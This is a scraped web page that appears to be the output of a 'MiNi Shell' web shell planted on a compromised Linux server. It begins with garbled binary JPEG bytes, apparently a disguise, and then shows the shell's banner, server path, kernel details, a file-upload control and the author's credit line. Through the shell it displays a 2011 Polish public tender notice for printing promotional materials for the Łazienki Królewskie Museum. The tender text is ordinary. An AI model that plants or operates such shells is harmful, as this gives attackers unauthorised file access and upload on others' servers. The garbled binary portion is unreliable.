JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110419/119469-N-2011.html

<p class="kh_header"><b>Warszawa: Usługa druku i oprawy materiałów promocyjnych dla Muzeum Łazienki Królewskie - Zespół  Pałacowo - Ogrodowy, ul. Agrykoli 1, 00-460 Warszawa.</b><br>
<b>Numer ogłoszenia: 119469 - 2011; data zamieszczenia: 19.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Łazienki Królewskie - Zespół Pałacowo-Ogrodowy , ul. Agrykoli 1, 00-460 Warszawa, woj. mazowieckie, tel. 022 50 60 197, 50 60 174, faks 022 50 60 174.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lazienki-krolewskie.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.lazienki-krolewskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa druku i oprawy materiałów promocyjnych dla Muzeum Łazienki Królewskie - Zespół  Pałacowo - Ogrodowy, ul. Agrykoli 1, 00-460 Warszawa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dział Marketingu	

Pocztówki
Format: DL (210 x 99 mm)
Papier: karton dwustronnie powlekany 250 g (wysokiej jakości)
Kolory: 5 +1 + lakier UV 1+0
Nakład: drukowane w 8 transzach - 10 wzorów po 250 sztuk,  proof kolorystyczny do każdego wzoru do akceptacji przez Zamawiającego	20 000					
	Plakaty
Format: 700x1000 mm
Papier: materiał banerowy 510 g (Wysoka biel, gramatura 510 g, sposób powleczenia oraz bardzo gęsta osnowa idealnie sprawdza się w trudnych warunkach, doskonałe parametry powierzchni pozwalające na druk wysokiej jakości)
Kolory: 4+0 (druk wyokiej rozdzielczości)
Nakład: drukowane w transzach 100 x 10 sztuk
Termin realizacji dla każdej z transz: proof 2 h, akcept do 16.00, dostawa następnego dnia 
do 9.00 rano (nie ma znaczenia czy jest to dzień roboczy czy nie)	1 000					
	Ulotki
Format: 420x297 mm
Papier: offset 140 g
Kolory: 5+5
Oprawa: bigowanie, falcowanie (A3/3), cięcie do formatu 
Nakład: rózne wzory drukowane w transzach rozłożonych w czasie - 3 x 1000 sztuk, 4 x 10 000, 1 x 30 000, 
pakowanie po 100 sztuk, proof 2 h, druk 48h	73 000					
	
Zaproszenia z kopertami
Format: 105 x 148 mm
Papier: 250 g papier ozdobny, biały jasny supergładki
Kolory: 5+0
Oprawa: cięcie do formatu
Koperta - C6, papier niepowlekany wysokiej jakości i bieli 120g, tylna klapa w trójkąt, samoklejaca bez paska, nadruk logo - 1 kolor, hot stamping wysokiej rozdzielczości
Nakład: druk w transzach rozłożonych w czasie - 8 wzorów x 800 sztuk 6 400					
	Kalendarze B1 na ścianę
Oprawa: listwy aluminium z jedna zawieszką
Format: 680x980 mm
Papier: kreda, 150 g
Kolory: 4 + lakier offsetowy zabezpieczający
Nakład: 2 wzory po 500 sztuk	1 000					
	Mapa Łazienek
Format: 420x297 mm
Papier: offset 140 g
Kolory: 5+5
Oprawa: bigowanie, falcowanie (A3/3), cięcie do formatu 
Nakład: 15 000 (w transzach 5 x 3000 sztuk)
konfekcjonowanie po 100 sztuk, proof 2 h	15 000					
	
Przewodnik, wersja polska, mała
Okładka: miękka z zakładkami, (8 stron, format ok. 410 x 205 mm), kreda 250 g wysokiej jakości i bieli, 
Kolory: 5 + 5 + lakier UV 1+0
Oprawa: szyto - klejona (bardzo wysokiej jakości, przy użytkowaniu nie może się rozpadać)
Format: 100 x 205 mm
Liczba stron środka: 120 stron
Papier środek: kreda, 100 g wysokiej jakości i bieli
Kolory: 5+5; proofy i wydruki próbne całości
Nakład: 5 x 2 000 sztuk	10 000					
	
Folder sprzedażowy Muzeum
Okładka: miękka z zakładką 
(8 stron okładki, format ok. 840 x 297 mm)
Oprawa: szyta
Format: 210x297 mm
Liczba stron: 12 + okładka
Papier dla całosci: kreda, 150 g wysokiej jakości i bieli
Kolory: 5+5 + lakier UV wybiórczo tylko na okładce 1+0	500					
							
Dział Edukacji	

Folder oferty dla szkół i przedszkoli - lekcje muzealne 
Format: 400 x 210 mm - skladane na 4 
Papier: offset gładzony 150 g
kolory: 5+5
Nakład: 3 x 5000 sztuk w roku	15 000					
	
Folder oferty wykładów i spotkań dla osób doroslych; 
Format: A3 skladane na 3
Papier: offset gładzony 150 g
Kolory: 5+5
Nakład: 4 x 3000 sztuk w roku	12 000					
	
Katalog z ofertą edukacyjną
Format: 120 x 210 mm
liczba stron: 20 ? 4 strony
papier środek: offset 100 g
papier okładka: karton 250 powlekany, folia mat 1+0
oprawa: szyta
Kolory: 5+5
Nakład: 4 x 3000 sztuk w roku	12 000					
	
Inne druki akcydensowe, np. ulotka informująca o lekcjach muzealnych 
Format: 400 x 210 mm - skladane na 4 
Papier: offset gładzony 150 g
kolory: 5+5
Nakład: 3 x 5000 sztuk w roku	15 000					
							
Dział 
Administracyjno
-Gospodarczy	

Wizytówki
materiał: papier ozdobny -  biały jasny, supergładki, bardzo wysokiej jakości 250g
gramatura: 250g
Kolory: 1+0
Nakład: drukowane w transzach po 100 lub 200 sztuk 3 000					
	
Bilety wizytowe With Compliments z elegancką kopertą
format:  A6
materiał: papier ozdobny - biały jasny, supergładki, bardzo wysokiej jakości i wysokiej bieli, gramatura: 250g
Kolory: 1+0
Koperta: C6, papier wysokiej jakości i wysokiej bieli 120 g niepowlekany, klapa tylna w trójkąt, nadruk 1 kolor logo
Nakład: 3 x 1000 sztuk w roku                                                                  	3 000					
	Obwoluty
wymiar 30,5x22cm
Materiał: kreda 300g matowa, biała
Kolory: 1+0
Nakład: druk w transzach 5 x 100 sztuk w roku	500.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0, 22.14.00.00-3, 22.15.00.00-6, 22.31.00.00-6, 22.90.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunek w zakresie: posiadania wiedzy i doświadczenia, tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - zrealizowaliśmy/w przypadku usług okresowych lub ciągłych realizujemy* (przy czym do dnia składania ofert wartość zrealizowanej części musi przekraczać kwoty określone w lit. a i b): 
a)	co najmniej dwie usługi wykonywania materiałów reklamowych (ulotki, plakaty, wizytówki, kalendarze ścienne i okładkowe, foldery reklamowe, zaproszenia, pocztówki, bilety wstępu, torby reklamowe plastikowe i papierowe), o wartości nie mniejszej niż 100.000 zł netto każda;
b)	co najmniej dwie usługi, których przedmiotem był druk książek (przewodników), katalogów wystawowych, albumów o wartości co najmniej 50. 000 zł netto każda;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lazienki-krolewskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.lazienki-krolewskie.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2011 godzina 12:00, miejsce: Muzeum Łazienki Królewskie - Zespół Pałacowo-Ogrodowy, ul. Agrykoli 1, 00-460 Warszawa, budynek Podchorążówki, w Sekretariacie, pokój 01, I piętro,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com